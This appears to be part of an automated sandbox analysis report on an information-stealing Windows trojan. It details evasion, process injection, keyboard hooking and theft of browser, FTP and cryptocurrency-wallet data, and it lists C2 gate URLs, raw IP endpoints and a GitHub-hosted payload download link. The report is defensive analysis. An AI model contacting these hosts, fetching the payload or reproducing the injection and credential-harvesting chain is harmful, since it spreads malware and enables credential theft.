              Source: C:\Users\user\Desktop\EgNIXduB6T.exe TID: 5864Thread sleep time: -56900s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe TID: 5408Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe TID: 5248Thread sleep count: 123 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe TID: 5248Thread sleep time: -7380000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe TID: 2140Thread sleep time: -42000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe TID: 5248Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeThread sleep count: Count: 5690 delay: -10Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeWindow / User API: threadDelayed 5690Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-22640
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E21000 WinHttpOpen,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,WinHttpConnect,MultiByteToWideChar,MultiByteToWideChar,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,GetSystemInfo,VirtualAlloc,WinHttpQueryDataAvailable,GetSystemInfo,VirtualAlloc,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpCloseHandle,WinHttpCloseHandle,VirtualFree,0_2_00E21000
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013070D8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_013070D8
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01304A96 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_01304A96
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01304860 __EH_prolog,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,2_2_01304860
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01318DA6 FindFirstFileExA,2_2_01318DA6
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeThread delayed: delay time: 60000Jump to behavior
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.240446775.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.240446775.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.505628300.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276459822.0000000001919000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507800220.0000000001919000.00000004.00000020.00020000.00000000.sdmp, hjrypmyqervekvpteu.exe, 00000002.00000002.506259275.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: hjrypmyqervekvpteu.exe, 00000002.00000002.506259275.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oyw
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611CB7F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0611CB7F
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E21700 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,VirtualProtectEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetExitCodeProcess,ReadProcessMemory,Sleep,0_2_00E21700
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0131A16C GetProcessHeap,2_2_0131A16C
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_06139620 mov ecx, dword ptr fs:[00000030h]0_2_06139620
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_06140A23 mov eax, dword ptr fs:[00000030h]0_2_06140A23
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_06140A67 mov eax, dword ptr fs:[00000030h]0_2_06140A67
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_060A7330 mov eax, dword ptr fs:[00000030h]0_2_060A7330
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013127B2 mov eax, dword ptr fs:[00000030h]2_2_013127B2
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611CB7F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0611CB7F
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0612B856 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0612B856
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611C895 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0611C895
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130A026 SetUnhandledExceptionFilter,2_2_0130A026
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_0130A461 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0130A461
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01309E90 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01309E90
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01310EEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01310EEF

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F0000Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F0001Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F0065Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F00D0Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F00CCJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F00D4Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F00D8Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory written: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 2100000Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory allocated: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 20F0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeMemory allocated: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe base: 2100000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeThread created: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe EIP: 2100000Jump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_00E21700 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,VirtualProtectEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetExitCodeProcess,ReadProcessMemory,Sleep,0_2_00E21700
              Source: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exeProcess created: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe "C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe" Jump to behavior
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.265279325.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260589548.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.508509497.0000000002500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.265279325.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260589548.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.508509497.0000000002500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.265279325.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260589548.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.508509497.0000000002500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.265279325.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260589548.0000000002500000.00000002.00000001.00040000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.508509497.0000000002500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: hjrypmyqervekvpteu.exe, 00000002.00000002.506259275.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2022/10/10 06:03:15 Program Manager]
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611CCA2 cpuid 0_2_0611CCA2
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611CE86 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0611CE86
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_06141219 GetTimeZoneInformation,0_2_06141219
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01307C21 __EH_prolog,GetComputerNameExW,GetUserNameW,2_2_01307C21
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
              Source: EgNIXduB6T.exe, 00000000.00000003.251492860.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506305545.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251507801.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251543471.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369076182.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251553922.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.251716077.000000000158B000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254574382.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.254484833.000000000157F000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.505810375.00000000014ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.1e00000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.1e00000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.5f00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.5f00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: Yara matchFile source: Process Memory Space: EgNIXduB6T.exe PID: 5796, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.1e00000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.1e00000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.5f00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.EgNIXduB6T.exe.5f00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation
              Path Interception412
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              2
              Exfiltration Over Alternative Protocol
              2
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
              Obfuscated Files or Information
              221
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth21
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              Masquerading
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares221
              Input Capture
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
              Virtualization/Sandbox Evasion
              NTDS44
              System Information Discovery
              Distributed Component Object Model2
              Clipboard Data
              Scheduled Transfer3
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script412
              Process Injection
              LSA Secrets1
              Query Registry
              SSHKeyloggingData Transfer Size Limits234
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials151
              Security Software Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem31
              Virtualization/Sandbox Evasion
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Application Window Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              System Owner/User Discovery
              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
              Remote System Discovery
              Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 719200 Sample: EgNIXduB6T.exe Startdate: 10/10/2022 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 6 other signatures 2->47 7 EgNIXduB6T.exe 5 2->7         started        process3 dnsIp4 23 194.190.152.194, 49692, 49694, 49695 RSHB-ASRU Russian Federation 7->23 25 77.73.133.53, 49691, 49693, 80 AS43260TR Kazakhstan 7->25 49 Contains functionality to inject threads in other processes 7->49 51 Tries to harvest and steal ftp login credentials 7->51 53 Tries to harvest and steal browser information (history, passwords, etc) 7->53 55 4 other signatures 7->55 11 wJpTOIbAbrslKXUFtgsTdnp.exe 16 7->11 injected signatures5 process6 dnsIp7 27 github.com 140.82.121.3, 443, 49698 GITHUBUS United States 11->27 29 raw.githubusercontent.com 185.199.108.133, 443, 49699 FASTLYUS Netherlands 11->29 19 C:\Users\user\...\hjrypmyqervekvpteu.exe, PE32 11->19 dropped 21 C:\Users\user\AppData\Local\...\winscr[1].exe, PE32 11->21 dropped 15 hjrypmyqervekvpteu.exe 1 412 11->15         started        file8 process9 dnsIp10 31 185.106.92.60, 21, 49707, 49708 SUPERSERVERSDATACENTERRU Russian Federation 15->31 33 Multi AV Scanner detection for dropped file 15->33 35 Machine Learning detection for dropped file 15->35 37 Contains functionality to register a low level keyboard hook 15->37 39 Installs a global keyboard hook 15->39 signatures11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              EgNIXduB6T.exe62%ReversingLabsWin32.Trojan.Bingoml
              EgNIXduB6T.exe68%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\winscr[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\winscr[1].exe45%ReversingLabsWin32.Spyware.Xegumumune
              C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe45%ReversingLabsWin32.Spyware.Xegumumune
              No Antivirus matches
              SourceDetectionScannerLabelLink
              raw.githubusercontent.com2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://fs.microsoft.c0%URL Reputationsafe
              https://curl.se/docs/hsts.html0%URL Reputationsafe
              https://curl.se/docs/http-cookies.html0%URL Reputationsafe
              https://curl.se/docs/alt-svc.html0%URL Reputationsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exep0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeSSC:0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe0%Avira URL Cloudsafe
              http://77.73.133.53/cloud/index.php0%Avira URL Cloudsafe
              http://77.73.133.53/cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%200%Avira URL Cloudsafe
              http://194.190.152.194/gate.phpd0%Avira URL Cloudsafe
              https://support.g#0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe2%VirustotalBrowse
              http://194.190.152.194/api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%200%Avira URL Cloudsafe
              http://194.190.152.194/gate.php0%Avira URL Cloudsafe
              http://77.73.133.53/cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%200%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exe10%Avira URL Cloudsafe
              https://raw.githubusercontent.com/0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exeLMEM0%Avira URL Cloudsafe
              http://194.190.152.194/api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%200%Avira URL Cloudsafe
              https://raw.githubusercontent.com/V0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exey0%Avira URL Cloudsafe
              http://194.190.152.194/gate.phpphp0%Avira URL Cloudsafe
              https://raw.githubusercontent.com/d0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              github.com
              140.82.121.3
              truefalse
                high
                raw.githubusercontent.com
                185.199.108.133
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                http://77.73.133.53/cloud/index.phptrue
                • Avira URL Cloud: safe
                unknown
                https://raw.githubusercontent.com/lakrica0/TeIegram/main/winscr.exefalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://77.73.133.53/cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20true
                • Avira URL Cloud: safe
                unknown
                http://194.190.152.194/api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20true
                • Avira URL Cloud: safe
                unknown
